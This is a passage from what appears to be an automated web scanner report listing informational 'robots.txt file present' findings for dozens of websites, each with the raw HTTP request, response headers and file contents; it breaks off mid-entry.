Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mytones.us

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:29:50 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Fri, 07 Jan 2011 16:15:33 GMT
ETag: "8a60c87-1a-49943ed7b9340"
Accept-Ranges: bytes
Content-Length: 26
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /

26.729. http://www.mytoolstore.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mytoolstore.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mytoolstore.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:40:23 GMT
Server: Apache
Last-Modified: Wed, 09 Jun 2010 19:50:52 GMT
ETag: "1f58337-25d-4889e39285f00"
Accept-Ranges: bytes
Content-Length: 605
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /cgi-bin/
Disallow: /advanta/
Disallow: /assets/
Disallow: /cart/
Disallow: /isearch/
Disallow: /test/
Disallow: /tell/
Disallow: /sherline/
Disallow: /privacy1.html
Disallow:
...[SNIP]...

26.730. http://www.nanowerk.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nanowerk.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.nanowerk.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:36:12 GMT
Server: Apache
Last-Modified: Mon, 21 Mar 2011 14:57:28 GMT
ETag: "89a7c3f1-385-49eff58b4f15e"
Accept-Ranges: bytes
Content-Length: 901
Connection: close
Content-Type: text/plain

User-agent: *
Sitemap: http://www.nanowerk.com/sitemap.xml
Disallow: /jsscripts/
Disallow: /library/
Disallow: /mmServerScripts/
Disallow: /Connections/
Disallow: /indextest.php
Disallow: /inde
...[SNIP]...

26.731. http://www.nationalbuildersupply.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nationalbuildersupply.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.nationalbuildersupply.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Wed, 22 Dec 2010 18:04:47 GMT
Accept-Ranges: bytes
ETag: "487a21b82a2cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:17:14 GMT
Connection: close
Content-Length: 435

User-agent: *
Disallow: /User/
Disallow: /Profile/
Disallow: /Cart.aspx
Disallow: /Cart.html
Disallow: /cart.aspx
Disallow: /JustAdded.aspx
Disallow: /SaveForLater.aspx
Disallow: /MyCheckout/
...[SNIP]...

26.732. http://www.naturalhealers.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.naturalhealers.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.naturalhealers.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:58:41 GMT
Server: Apache/2.0.52 (Red Hat) PHP/4.3.9 mod_ssl/2.0.52 OpenSSL/0.9.7a
X-Powered-By: PHP/4.3.9
Content-Length: 1677
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

# Disallow requests from TurnitinBot
User-agent: TurnitinBot
Disallow: /

# Disallow requests from Zealbot
User-agent: Zealbot
Disallow: /

User-agent: AdsBot-Google
Crawl-delay: 5
Disallow: /inc
Dis
...[SNIP]...

26.733. http://www.nccde.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nccde.org
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.nccde.org

Response

HTTP/1.1 200 OK
Content-Length: 440
Content-Type: text/plain
Last-Modified: Tue, 10 Aug 2010 13:53:01 GMT
Accept-Ranges: bytes
ETag: "94f3cc589338cb1:7af"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:15:53 GMT
Connection: close

User-agent: *
Disallow: /parcelview/
Disallow: /taxbills/
Disallow: /ParcelView/
Disallow: /TaxBills/
Disallow: /Viewer/
Disallow: /viewer/
Disallow: /LicenseSearch/
Disallow: /licensesearch/
...[SNIP]...

26.734. http://www.neaq.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.neaq.org
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.neaq.org

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:45:10 GMT
Server: Apache/2.0.63 (Red Hat)
Last-Modified: Tue, 25 May 2010 01:51:37 GMT
ETag: "2c20e70-91-65d6dc40"
Accept-Ranges: bytes
Content-Length: 145
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /_mm/
Disallow: /_notes/
Disallow: /_baks/
Disallow: /MMWIP/
Disallow: /index.html

User-agent: googlebot
Disallow: *.csi

26.735. http://www.needlepointers.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.needlepointers.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.needlepointers.com

Response

HTTP/1.1 200 OK
Content-Length: 195
Content-Type: text/plain
Last-Modified: Sat, 30 Dec 2006 01:36:19 GMT
Accept-Ranges: bytes
ETag: "e2ec9e7b22bc71:a2b"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:19:42 GMT
Connection: close

User-agent: *
Disallow: /admin/
Disallow: /images/
Disallow: /secure/
Disallow: /AdminMenu/
Disallow: /bin/
Disallow: /*.ico$
Disallow: /*.asp$
Disallow: /*.css$
Disallow: /version1/

26.736. http://www.netfit.co.uk/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.netfit.co.uk
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.netfit.co.uk

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 03 May 2011 11:27:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 109

User-agent: *

Disallow: /bin/
Disallow: /_aspx/
Disallow: /_scr/
Disallow: /admin/
Disallow: /members/

26.737. http://www.netminers.dk/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.netminers.dk
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.netminers.dk

Response

HTTP/1.1 200 OK
Content-Length: 48
Content-Type: text/plain
Last-Modified: Wed, 09 Dec 2009 14:30:49 GMT
Accept-Ranges: bytes
ETag: "2827d733dc78ca1:39fde"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:16:31 GMT
Connection: close

User-agent: *
Disallow: /cms.ashx
Allow: /

26.738. http://www.newholdonsecurity.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.newholdonsecurity.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.newholdonsecurity.com

Response

HTTP/1.1 200 OK
Content-Length: 126
Content-Type: text/plain
Last-Modified: Mon, 19 Oct 2009 22:41:58 GMT
Accept-Ranges: bytes
ETag: "0bf955dd51ca1:2bc"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:53:23 GMT
Connection: close

User-agent: *
Disallow: /images/spacer.gif
Disallow: /ct.html
Disallow: /sd/
Disallow: /st.aspx
Disallow: /ct/ct.aspx

26.739. http://www.newjerseyshore.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.newjerseyshore.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.newjerseyshore.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:26:41 GMT
Server: Apache
Last-Modified: Thu, 24 Jun 2010 17:42:50 GMT
ETag: "47d00f3-2d-2ee4fa80"
Accept-Ranges: bytes
Content-Length: 45
Connection: close
Content-Type: text/plain; charset=UTF-8

User-Agent: *
Disallow: /old-newjerseyshore/

26.740. http://www.newregistryrepairreviews.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.newregistryrepairreviews.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.newregistryrepairreviews.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:42:42 GMT
Server: Apache
Last-Modified: Mon, 31 May 2010 02:20:11 GMT
ETag: "2032a28-c1-4c031cdb"
Accept-Ranges: bytes
Content-Length: 193
Connection: close
Content-Type: text/plain

User-Agent:*
Sitemap: http://www.newregistryrepairreviews.com/sitemap.xml
User-agent: *
Allow: /*
Disallow: admin.php
Disallow: /admin/
Disallow: /includes/
Disallow: /*.js$
Disallow: /*.css$

26.741. http://www.newverhost.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.newverhost.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.newverhost.com

Response

HTTP/1.0 200 OK
Date: Tue, 03 May 2011 10:10:40 GMT
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.2.13
X-Pingback: http://newverhost.com/wordpress/xmlrpc.php
Content-Length: 71
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

Sitemap: http://newverhost.com/sitemap.xml.gz

26.742. http://www.nextmark.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nextmark.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.nextmark.com

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: text/plain; charset=UTF-8
Date: Tue, 03 May 2011 10:44:28 GMT
Accept-Ranges: bytes
Connection: close
Set-Cookie: X-Mapping-cffoajmn=12B5D5FE49F27FE23F2FF51B08A36BC6; path=/
Last-Modified: Sat, 15 Jan 2011 02:32:51 GMT
Content-Length: 47

# NextMark robots.txt
User-agent: *
Disallow:

26.743. http://www.nextstat.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nextstat.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.nextstat.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:44:06 GMT
Server: Apache/2.0.52 (CentOS)
Last-Modified: Wed, 02 Mar 2011 06:31:26 GMT
ETag: "7c1ef-72-ff30b80"
Accept-Ranges: bytes
Content-Length: 114
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Allow: /
Disallow: /w3c
Disallow: /tech_t
Disallow: /images
Disallow: /js
Disallow: /affiliate

26.744. http://www.nfib.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nfib.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.nfib.com

Response

HTTP/1.1 200 OK
Content-Length: 465
Content-Type: text/plain
Content-Location: http://www.nfib.com/robots.txt
Last-Modified: Tue, 08 Feb 2011 17:27:21 GMT
Accept-Ranges: bytes
ETag: "bfe43e71b5c7cb1:27d7"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:31:31 GMT
Connection: close

User-agent: *
Disallow: /App_Browser
Disallow: /App_Code
Disallow: /App_Data
Disallow: /App_GlobalResources
Disallow: /aspnet_client
Disallow: /Bin
Disallow: /Components
Disallow: /Config
Dis
...[SNIP]...

26.745. http://www.nfo.ph/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nfo.ph
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.nfo.ph

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:39:41 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Thu, 29 Jul 2010 21:24:12 GMT
Accept-Ranges: bytes
Content-Length: 96
Vary: Accept-Encoding,User-Agent
X-Powered-By: W3 Total Cache/0.9.1.3
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /wp-admin/
Disallow: /wp-includes/
Disallow: /wp-content/
Allow: /

26.746. http://www.niagarafallsmarriott.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.niagarafallsmarriott.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.niagarafallsmarriott.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:18:38 GMT
Server: Apache
Last-Modified: Wed, 21 Oct 2009 19:20:14 GMT
Accept-Ranges: bytes
Content-Length: 82
Connection: close
Content-Type: text/plain

Sitemap: http://www.niagarafallsmarriott.com/sitemap.xml
User-agent: *
Disallow:

26.747. http://www.nic.ru/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nic.ru
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.nic.ru

Response

HTTP/1.1 200 OK
Server: nginx/0.8.52
Date: Tue, 03 May 2011 10:20:00 GMT
Content-Type: text/plain; charset=windows-1251
Connection: close
Last-Modified: Tue, 05 Oct 2010 12:38:11 GMT
ETag: "386c01-80-4cab1c33"
Accept-Ranges: bytes
Content-Length: 128
X-Cache: MISS from www.nic.ru

User-agent: *
Disallow: /cgi-bin/
Disallow: /cgi/na.cgi
Disallow: /whois
Disallow: /sess/
Disallow: /manager/
Host: www.nic.ru:

26.748. http://www.nikonians.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nikonians.org
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.nikonians.org

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:15:20 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Mon, 25 Feb 2008 15:21:28 GMT
ETag: "48008d9-2a7-446fd20372e00"
Accept-Ranges: bytes
Content-Length: 679
Connection: close
Content-Type: text/plain

User-agent: Gigabot*
Disallow: /

User-agent: MJ12bot*
Disallow: /

User-agent: BecomeBot*
Disallow: /

User-agent: YodaoBot*
Disallow: /

User-agent: MojeekBot*
Disallow: /

User-agent: RedBot*
Disal
...[SNIP]...

26.749. http://www.nmtc.net/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nmtc.net
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.nmtc.net

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Tue, 03 May 2011 10:35:57 GMT
Content-Type: text/plain
Content-Length: 62
Last-Modified: Tue, 25 May 2010 20:14:31 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

User-agent: *
Disallow: /phpmyadmin
Allow: /
Disallow: /admin

26.750. http://www.nocccd.edu/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nocccd.edu
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.nocccd.edu

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:33:51 GMT
Server: Apache/2.0.61 (Unix) DAV/2
Last-Modified: Thu, 24 May 2007 22:21:01 GMT
ETag: "1e935-84-b299cd40"
Accept-Ranges: bytes
Content-Length: 132
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /_mm/
Disallow: /_notes/
Disallow: /_baks/
Disallow: /MMWIP/

User-agent: googlebot
Disallow: *.csi

26.751. http://www.northerntrust.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.northerntrust.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.northerntrust.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:14:36 GMT
Last-Modified: Mon, 05 May 2008 14:07:52 GMT
ETag: "3fc124-6d-41e49e00"
Accept-Ranges: bytes
Content-Length: 109
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /images/
Disallow: /tmp/
Disallow: /private/
Disallow: /bowker/
Disallow: /incs/

26.752. http://www.nowness.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nowness.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.nowness.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=604800
Content-Type: text/plain
Last-Modified: Wed, 03 Mar 2010 22:27:17 GMT
Accept-Ranges: bytes
ETag: "80103cae20bbca1:0"
Server: Microsoft-IIS/7.0
p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM"
Set-Cookie: auid2010=g_2ib-s1Mv2tAPZizCFKq81_Q39Y-NHLw9rqNkzRrvGelEwjOiPS65WkVMQu3gXHXqLR6xrfMJw58LGNtNnhO0kK3r85TnYLMabqtsKEiBKOhRZJXcrmy0fwjfj9qqcycrWHB2J9T8xHm26R9nx-tu-58ao1; expires=Tue, 03-May-2011 12:03:35 GMT; path=/; HttpOnly
sv: h-1
Date: Tue, 03 May 2011 11:03:34 GMT
Connection: close
Content-Length: 80

Sitemap: http://www.nowness.com/sitemap.xml
User-Agent: *
Disallow: /account

26.753. http://www.npdlink.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.npdlink.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.npdlink.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:33:31 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 23 Mar 2005 19:30:53 GMT
ETag: "c60428-116-ffd71540"
Accept-Ranges: bytes
Content-Length: 278
Connection: close
Content-Type: text/plain

User-agent: Mediapartners-Google*
User-agent: *
Disallow: admin.php
Disallow: config.php
Disallow: /admin/
Disallow: /images/
Disallow: /includes/
Disallow: /themes/
Disallow: /blocks/
Disallow: /modu
...[SNIP]...

26.754. http://www.nu.nl/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nu.nl
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.nu.nl

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Host
Last-Modified: Fri, 17 Jul 2009 15:19:24 GMT
Content-Type: text/plain; charset=utf-8
P3P: policyref="http://www.nu.nl/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMa DEVa PSAa PSDa IVAa IVDa OUR IND UNI COM NAV INT STA"
Content-Length: 117
Date: Tue, 03 May 2011 10:36:25 GMT
X-Varnish: 957948636 957930084
Age: 53
Via: 1.1 varnish
Connection: keep-alive
X-Cache-Hits: 2
X-Id: ilsia222
Via: 1.1 ilsia260.gsa

# Disallow spiders to crawl the search pages

User-Agent: *
Disallow: /zoeken/
Disallow: /suchen/
Disallow: /search/

26.755. http://www.nudism.ws/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nudism.ws
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.nudism.ws

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:05:47 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_perl/2.0.4 Perl/v5.8.8
Last-Modified: Thu, 14 Feb 2008 02:24:56 GMT
ETag: "855c63e-e0-44614fedc8e00"
Accept-Ranges: bytes
Content-Length: 224
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cgi-bin/

User-agent: Titan
Disallow: /

User-agent: EmailCollector
Disallow: /

User-agent: EmailSiphon
Disallow: /

User-agent: EmailWolf
Disallow: /

User-agent: Ex
...[SNIP]...

26.756. http://www.nuffnang.com.au/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nuffnang.com.au
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.nuffnang.com.au

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:26:09 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.9
X-Pingback: http://www.nuffnang.com.au/xmlrpc.php
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

26.757. http://www.nwfcu.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nwfcu.org
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.nwfcu.org

Response

HTTP/1.1 200 OK
Connection: close
Content-Length: 512
Date: Tue, 03 May 2011 11:20:14 GMT
Content-Location: http://www.nwfcu.org/robots.txt
Content-Type: text/plain
ETag: "80c08dfdc28cb1:88e"
Server: Microsoft-IIS/6.0
Last-Modified: Wed, 21 Jul 2010 13:59:01 GMT
Accept-Ranges: bytes
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET

User-agent: *
Disallow: /aspnet_client/
Disallow: /Connections/
Disallow: /fpdb/
Disallow: /kiosk/
Disallow: /arb/
Disallow: /Library/
Disallow: /loansurvey/
Disallow: /nwfcutemplate/
Disallo
...[SNIP]...

26.758. http://www.o.biz/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.o.biz
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.o.biz

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:25:39 GMT
Server: Apache
Vary: Host
Last-Modified: Tue, 02 Nov 2010 05:25:53 GMT
Accept-Ranges: bytes
Content-Length: 918
Keep-Alive: timeout=5, max=74
Connection: Keep-Alive
Content-Type: text/plain

User-Agent: *
Disallow: /sm-*
Disallow: /cart
Disallow: /checkout
Disallow: /cgi-bin/d2.cgi?PAGE=MYACCOUNT
Disallow: /cgi-bin/d2.cgi?SEC_IID=27592&PAGE=MYACCOUNT
Disallow: /cgi-bin/d2.cgi?PAGE=MYACCOU
...[SNIP]...

26.759. http://www.oakgov.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oakgov.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.oakgov.com

Response

HTTP/1.1 200 OK
Content-Length: 263
Content-Type: text/plain
Content-Location: http://www.oakgov.com/robots.txt
Last-Modified: Wed, 29 Oct 2003 19:53:51 GMT
Accept-Ranges: bytes
ETag: "789b1d60569ec31:5883"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:35:49 GMT
Connection: close

User-agent: * # directed to all spiders

Disallow: /start
Disallow: /intranet
Disallow: /alert
Disallow: /ice
Disallo
...[SNIP]...

26.760. http://www.oaktreevintage.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oaktreevintage.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.oaktreevintage.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:28:25 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Tue, 23 Jun 2009 22:16:30 GMT
ETag: "2871b5f-2c-57af0b80"
Accept-Ranges: bytes
Content-Length: 44
Connection: close
Content-Type: text/plain

User-agent: Mediapartners-Google
Disallow:

26.761. http://www.oceana.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oceana.org
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.oceana.org

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:02:13 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Mon, 01 Nov 2010 20:11:54 GMT
ETag: "23d30c-5d-6b5e5680"
Accept-Ranges: bytes
Content-Length: 93
Connection: close
Content-Type: text/plain; charset=UTF-8

# /robots.txt for http://www.oceana.org
# comments to info@oceana.org
User-agent: *
Allow: *

26.762. http://www.officefurniture2go.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.officefurniture2go.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.officefurniture2go.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Sat, 07 Nov 2009 19:51:30 GMT
Accept-Ranges: bytes
ETag: "0d12b3e35fca1:0"
Server: Microsoft-IIS/7.5
P3P: CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo HIS TELo OUR IND STA"
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:17:33 GMT
Connection: close
Content-Length: 4627

User-agent: *

Crawl-Delay: 5

Request-rate: 1/10 1300-1659        # 8:00 am to noon EST
Request-rate: 1/30 1700-0459        # noon to 11:59 pm EST
Request-rate: 1/5 0500-1259        # midnight to 7:59 am EST

...[SNIP]...

26.763. http://www.okhistory.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.okhistory.org
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.okhistory.org

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:26:19 GMT
Server: Apache/2.0.52 (CentOS)
Last-Modified: Mon, 06 Dec 2010 15:17:49 GMT
ETag: "2a84a2-128-64172140"
Accept-Ranges: bytes
Content-Length: 296
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

User-agent: *
Disallow: /calweb/
Disallow: /contacts/
Disallow: /gift/
Disallow: /man/
Disallow: /newsdb/
Disallow: /OHS/
Disallow: /orders/
Disallow: /pubcontacts/
Disallow: /stats/
Disallow: /top/
D
...[SNIP]...

26.764. http://www.old-yearbooks.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.old-yearbooks.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.old-yearbooks.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:50:51 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 mod_fcgid/2.3.6
Last-Modified: Mon, 07 Feb 2011 18:48:16 GMT
ETag: "2c315c-17-49bb5acb87c00"
Accept-Ranges: bytes
Content-Length: 23
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

26.765. http://www.oldchevytruck.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oldchevytruck.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.oldchevytruck.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:38:51 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Fri, 28 May 2010 04:22:30 GMT
ETag: "2198aad-7c0-4879fdaf6cd80"
Accept-Ranges: bytes
Content-Length: 1984
Connection: close
Content-Type: text/plain

User-agent: Mediapartners-Google*
Disallow:

User-agent: Slurp
Crawl-delay: 120

User-agent: MSNBot
Crawl-delay: 120

User-agent: Yandex
Crawl-delay: 120

User-agent: *
Disallow: /admin/
Disallow: /te
...[SNIP]...

26.766. http://www.onedollaremailoffer.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.onedollaremailoffer.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.onedollaremailoffer.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:38:09 GMT
Server: Apache/2.2.14 (Ubuntu)
Set-Cookie: Apache=173.193.214.243.1304422689926402; path=/; expires=Wed, 29-Apr-26 11:38:09 GMT
X-Powered-By: PHP/5.3.2-1ubuntu4.5
